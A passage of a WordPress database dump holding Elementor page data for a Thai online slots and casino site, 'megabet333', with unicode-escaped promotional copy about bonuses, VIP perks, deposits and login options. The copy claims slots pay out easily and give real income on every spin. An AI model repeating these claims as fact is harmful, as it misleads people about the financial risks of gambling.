\\u0e41\\u0e25\\u0e30\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e15\\u0e49\\u0e32\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e20\\u0e32\\u0e29\\u0e32\\u0e44\\u0e17\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e49\\u0e07\\u0e14\\u0e38\\u0e14\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e08\\u0e4a\\u0e01\\u0e40\\u0e01\\u0e2d\\u0e23\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e04\\u0e27\\u0e23\\u0e1e\\u0e25\\u0e32\\u0e14 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e17\\u0e35\\u0e48\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e46<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1118,141,'_thumbnail_id','60'),(1119,141,'_elementor_edit_mode','builder'),(1120,141,'_elementor_template_type','wp-page'),(1121,141,'_elementor_version','3.32.5'),(1122,141,'_elementor_pro_version','3.32.3'),(1123,141,'_wp_page_template','default'),(1124,141,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1125,141,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/search_megabet_333_-_Megabet333-Biz.webp\",\"id\":60,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_Get_200_-_Megabet333-Biz.webp\",\"id\":53,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e23\\u0e30\\u0e1a\\u0e1a VIP \\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e04\\u0e48\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e19 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e41\\u0e17\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e01\\u0e23\\u0e14\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e14\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1e\\u0e49\\u0e43\\u0e04\\u0e23 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e27\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e47\\u0e15 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e22\\u0e31\\u0e07\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e15\\u0e2d\\u0e1a\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 3 \\u0e27\\u0e34\\u0e18\\u0e35\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2d\\u0e31\\u0e19\\u0e14\\u0e31\\u0e1a 1 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e37\\u0e48\\u0e19\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e22\\u0e39\\u0e2a\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e21\\u0e48\\u0e22\\u0e32\\u0e01 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e44\\u0e21\\u0e48\\u0e16\\u0e36\\u0e07\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e14\\u0e33\\u0e40\\u0e19\\u0e34\\u0e19\\u0e01\\u0e32\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e41\\u0e04\\u0e48 3 \\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49\\u00a0<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><b><span style=\\\"color: #ffcc00;\\\">\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d<\\/span> <\\/b>\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2a\\u0e48\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a OTP \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e08\\u0e32\\u0e01\\u0e19\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e31\\u0e49\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e42\\u0e0b\\u0e40\\u0e0a\\u0e35\\u0e22\\u0e25\\u0e21\\u0e35\\u0e40\\u0e14\\u0e35\\u0e22 <\\/b><\\/span>\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1c\\u0e48\\u0e32\\u0e19 Facebook, Google \\u0e2b\\u0e23\\u0e37\\u0e2d Line \\u0e44\\u0e14\\u0e49\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32\\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e0b\\u0e49\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e43\\u0e19\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e33\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07 <\\/b><\\/span>\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e08\\u0e14\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14\\u0e44\\u0e27\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e2b\\u0e31\\u0e2a \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e35\\u0e01 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e44\\u0e27\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e17\\u0e48\\u0e32\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e46 \\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e32\\u0e01\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e41\\u0e25\\u0e49\\u0e27\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e41\\u0e25\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u00a0<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Character_slot_1_-_Megabet333-Biz.webp\",\"id\":49,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 